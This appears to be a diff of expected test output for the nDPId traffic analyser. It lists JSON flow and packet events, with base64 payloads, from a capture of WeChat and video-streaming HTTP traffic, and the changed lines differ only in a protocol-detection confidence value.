01184{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1429000051366,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":596,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":596,"pkt_l4_len":560,"thread_ts_msec":1429000051366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAkSlZ0AAPwZ8rgo2qfrLzZeg1mMAUMsBdKl7s0qnUBgAbhITAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1zbnNzeW5jIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMjc1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGtleHRzaG9ydC53ZWl4aW4ucXEuY29tDQpVc2VyLUFnZW50OiBNaWNyb01lc3NlbmdlciBDbGllbnQNCg0KjV8mAQBBVSvQfd8CEAIXSGRsPmwM34SDANYBswPsAcTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYedk0uwBKYCKwk1caV589saz0xALfFf\/iYFlFx1AxUdy484YNnqVDF8K+kVH3f2c9yoInZasFWfv137RkUwmCH+br0dsm2pY5PlW8IbHQGBJKkdj6f6t1lujHjoakqif1dkWjRkTjcDfsFtBglw4jP18zIVy+uqXK+1IUwvsPz80+hSVjN5hP25Llmt\/ESe34eB\/LJMU4AkN\/2f0FWCACM2tXWSzYfJGQOBiLS2DO0iM0="} 00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1429000052145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":145,"pkt_l4_len":109,"thread_ts_msec":1429000052145,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAIFK0UAArQZq68vNl6AKNqn6AFDWY3uzUB\/LAXbFUBgIIl2QAADLSVkFxdhO01jGkqqir\/4Pe\/qItPtTf6ajYud7yQvoMcf18CvkFV3iH59UBVcusMzzLrB7pfuUH4Sme9ekIxa0n3Xkcqj9Zb8GTsGgT4pSgGI1jIGtnmYZvw=="} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7580000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"thread_ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01051{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1429000052217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000052217,"pkt":"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"} -01147{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7580000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"thread_ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01147{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7580000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"thread_ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7580000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1429000052348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":380,"pkt_l4_len":344,"thread_ts_msec":1429000052348,"pkt":"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"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7580000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7580000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7580000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"thread_ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
01001{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1429000052350,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":461,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":461,"pkt_l4_len":425,"thread_ts_msec":1429000052350,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAb2qTEAAPwZ4UAo2qfrLzZeg1mUAUE+SeI3XHwqaUBgAbsqdAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vZ2V0Y29udGFjdGxhYmVsbGlzdCBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29udGVudC1MZW5ndGg6IDEzMA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNColfJgEAQVUr0H3fAhACF0hkbD5sDN+EgwD\/BNABUsTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYeQoz6VrtJH00pu+gvbU58lmESj2o4D7TnERbmXXALCqM="} -00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7580000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"thread_ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/getcontactlabellist","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} 
+00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7580000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"thread_ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/getcontactlabellist","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} 00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1429000052688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000052688,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPWIBEAArAZEf8vNgWUKNqn6AFCnCZFyi8YwPunGUBgIIppgAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwC5BQwMAADES8+zVe2SBL6tUVxA2Vh6"} 
00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1429000053611,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000053611,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUJYEAArQar6MvNl6AKNqn6AFDWZdcfCppPknoiUBgIIrzYAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwD\/BAgIAACTADJ0e1hwz8xBqPPud44t"} 02362{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1429000054555,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1456,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1456,"pkt_l4_len":1420,"thread_ts_msec":1429000054555,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBaBrnEAArQYNK3gcIygKNqn6AFDLKctRyGZwAbOjUBAIIjnpAAC6eiaRjUv\/RPkOH82F5WosK669TTY41gIXUb5TM31DDCidAN9BA2XuM3HL8T4H8RaooiwzYVX\/NyYQvgJwozgBs+HWQERJo3j\/tFsg+NsbehQ2yqZ0ni5IF772nmOTUjjTqhvSyTYKL8LPX7\/SbJuUeesyVlCo1rcZrFyvobivL2QselZVKbZT9oXnVrTBXz9SgWOBGQjqM+6MYkHQqsKJwKvUzEiyfqsG7Y5ib\/HG3Cr61CWCOUzckjCo4x7\/2FXuS4bbTxyKoEXBeNcTCujBm4BW7TCl6yaZq2WXxGG4hvRF0Be\/m5kDX7D2ritov06P2eBHlozi8poVm+8iR+ps7ttJSDR9cRtIoZ6CzGQuMlpslQH3eGbKiA+TieQa5VKgPmn67A5ZHz6oVTfujJs8WKbjDDZ9Q0iRvNel4W1E1K\/\/zSVXoGcUMXf+jhnQwZpcpi1EdAnR+40BHozU+RTudhZL4Gple7Zf9xhKfQFyWOsUn76k3fkX1zxQlXwkMtX73RmtTyaB3L2pN7AlVM\/\/nWHu7EuLuT9DL9C5g0C9ndUmqL7NBsK0kAZZ78eDPfrNcCw\/ZFw2bNcbUFc\/DZYsLjg+otfm91LhV9Jp43mlKbIVnnDPmIDKMqjiCMwbTaSaZixrFny1uf5O00Y6dqEgtz9Pli4PyDpRhyoCvJu+i4H+d88Uaw2rkO46JoXyB7A5p5OjjhlkqrGyi1CwU0deobjNdyyDdV8jJ\/Pi9n3PsmZZgmuJXbUr3Wj33YeDG\/0Oj+2II0vRU4R2CMhv
6eJcxCNdiNxlxN6WMj7SN4Xwx9cQTGloH0v9P+ZbhisAixQQx+c7VnS53a6eMHAGjtfp5Vfl\/a+fbz\/SS6+0wsbw43YigcJZdKwu\/J+7R2Vsvwwp\/\/0VJXCclXCvQKK9ZgSyMjcZXFFdVBYQ9ynX2PKUJbCiQo0ZSacbctiB0eo38ldIKG1HQXiG+IvrS8x51f+MHkxe\/Qz6gFVONzxqGI2AuPK799Gz1u48EzIlwqf+hfJ5+80+67LPm7OKnX\/+Hglw20t2bXScSU\/7a\/No7LXMZaiPPFjItOLkydDIZdblKbD9VzRcriDGIikYRE2vOO7ef0bABx9ekxq7Y6qOz8wz2bfi82kKdO6ZKos8mJ6Z5zMskbhz5TARjuFwb\/y0CNvNRI3ZzaCcWvcSerQm6YI5Qkh9hi+UFoCigmvOa40ltrSAgZJLwEzoigbbL\/Fux90aNws71lhYIk5rLapLHllGTYci4NeZq+lysN0NJeGSVgJjhywSjEcv98KS01SOoGP+L8hkrHHDndozayAIZx7KNatPdBhHierZx9hk7YaR2QyAaOf\/KGZ26mtXJD+fZ9qzzRf7VPOJIXRan6Mvh2X5ksvc+d2E+xpW4ZS3heqwr3GFyseSzu+SItPTkyOePTh5SBKlnurq4GBXzKzTiVp1gCObUjjb361kLXFDG8pv8RFHz9T71D1Nc2wSTzFugnvV1UNFiSfCUv5Hf3vreasQSxEc5M2HufON7Ls2Sq1av0HxiKW3cr3g1hTf6isQpBvLi2kzfVTuUfjZ4NfuituEBPk76dM0NGhwCE37DhDWyEA0CskC\/3LGpzpkwJVXZJneb4tZ6ZUUp9Tq8jwnKJrc9Xm0\/K+NOqhD9cfXeA0wPmIBqb\/50HOtK0ivaxJQrriFNfYzXGvwDWExqj3032B+UnoRZ9sdl+HDci1tJl2ZYTWQ\/jnW4QU+eyZsftpA1fidaKNXFUm98r6LCSgwEpKQko1ga3+vGDjVtQbFJqqZZSUhMiGE7JxSiWQR6m1VFOyrIP\/NGSlhQwEVU0AVlSc0flRUDOO1ef3Q8CCp+aj8TUh3wwIIfQUflA=="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7580000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
01212{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1429000054595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":616,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":616,"pkt_l4_len":580,"thread_ts_msec":1429000054595,"pkt":"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\/e6hatoyLaBnD1MiX1aSCFGHqc7sd1LbQ4Ji50\/nmut+cRtfu64v\/XpBgMs3P9k27B87PKWuZeRn0c7PoUNWA2a8JliIiEG\/iNlGYYh7Jh9YEWG\/gDJeOxQbfTuL3jKYttVpQbSW5W7M23rsRNXzMxlPjm7V+eiXogw4ZTrI0SYQBetGJTy4I9tf1xmHMyE6HsFYIlHFXzsGgJQf7uh78Qo0Kz+t0syWOECVQvp3s423G3nllPk9jmdcOLrj5HgsV0zUjYpYNBzzWvoRGUwiRoLkw=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7580000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7580000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 01052{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1429000054688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000054688,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeRjvEAAPwaG4wo2qfp4HCMoyykAUHABs6PLUc5cUBgk\/ZRuAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDIxLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} 00733{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1429000054967,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000054967,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUEEkAArQbHccvNgWUKNqn6AFCnCorJCJ8MOwSFUBgII8UCAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwDvBAYGAAAXudj2eCNNjv4Uv\/n42\/lx"} 
00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1429000055158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000055158,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUJYkAArAas5svNl6AKNqn6AFDWZdcfCppPknoiUBkIIrzXAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwD\/BAgIAACTADJ0e1hwz8xBqPPud44t"} -01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1429000052217,"flow_last_seen":1429000090450,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":19212,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1429000090450,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7580000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"thread_ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01297{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1429000110390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":681,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":681,"pkt_l4_len":645,"thread_ts_msec":1429000110390,"pkt":"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\/s0oeR4gum6gk+uWhqjv3Tkoz3jpOxZ3uqg5IoeAevVK78mE+75Mm5QEXaL\/24wa8I4nsiJTVEr54yg9WsIjA1I\/cd65YM57jS4+t1kJ\/xpqwwPsMfqK2G34N85Xo0uWP1F2PyLEjHiJZyK4xRu\/XYVzahdDn1vQRPtqQ3i2o6ggKNGN3kBkFa6C2GO0zTqwt7XUYqb0ppGq3KKIyPCtrTg5YICuEsfTDMTLer3J067M5VD93Ij+RkxqqGFN9+gvu+C\/smM0OksnEYsvtVnkr65ZF5Pk4qVPYHRDIlRcRHe0XzckIkJitYHFr8VSN2R6GxFfZK0YtMPQdmLxH6qLecheL3Cuuz7XcYpBc6JGpDIih+q4v"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7580000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"thread_ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
